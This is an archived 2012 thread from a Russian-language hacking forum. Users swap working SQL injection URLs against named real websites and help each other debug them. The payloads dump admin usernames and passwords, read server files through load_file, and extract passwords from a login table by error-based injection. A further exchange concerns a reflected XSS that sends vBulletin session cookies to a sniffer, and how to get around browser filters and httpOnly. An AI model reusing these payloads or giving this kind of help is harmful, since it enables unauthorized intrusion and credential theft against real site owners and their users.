ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.01.2012, 02:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
там нет таблицы tbl_admin, поэтому ошибка и вылетает
Код:
Code:
http://www.dunglac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,concat_ws%280x3a,user,pass%29,5,6,7,8,9,10,11,12,13+from+admin
|
|
|
|
13.01.2012, 10:55
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7--
тут прав не хватает, или я что-то не так делаю? |
|
|
13.01.2012, 11:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от faza02
faza02 said:
Код:
Code:
http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7--
тут прав не хватает, или я что-то не так делаю? с чего ты вообще взял что там file_priv?
|
|
|
|
13.01.2012, 11:25
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
я думал что если N, то будет ошибка
|
|
|
|
13.01.2012, 12:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от faza02
faza02 said:
я думал что если N, то будет ошибка
функция load_file в случае неудачи во время открытия файла, возвращает null
|
|
|
|
13.01.2012, 17:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Нашел в одном модуле для булки xss. Пассивную xss.
проблемы:
1) в гугл хроме не передает на снифер данные(остальные браузеры ок)
2) куки передаются такие - bblastvisit=1326457186;%20bblastactivity=0, а bbpasword и sessionhash нет. what the fuck?
|
|
|
|
13.01.2012, 17:36
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
1) В хроме и ИЕ >= 8 есть анти-XSS фильтр. Твой JS-код просто не выполняется
2) httpOnly
|
|
|
|
13.01.2012, 17:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от M_script
M_script said:
1) В хроме и ИЕ >= 8 есть анти-XSS фильтр. Твой JS-код просто не выполняется
2) httpOnly
1) только для xss В строке?
2) ?
+ можно ли при пассивной xss оформить перенаправление на другую страницу без js
|
|
|
|
13.01.2012, 19:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от None
have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'on'' at line 1
Select id, password, login, admin from `cosm_users` as ` where login='admin'' && admin='on'` where login='admin'' && admin='on'
вываливает, когда в админке в поле логина пишу admin' ... Что можно придумать?
|
|
|
|
13.01.2012, 20:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Код:
Code:
admin'or+1+and(select+1+from(select+count(*),concat((select+password+from+cosm_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+a
не? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
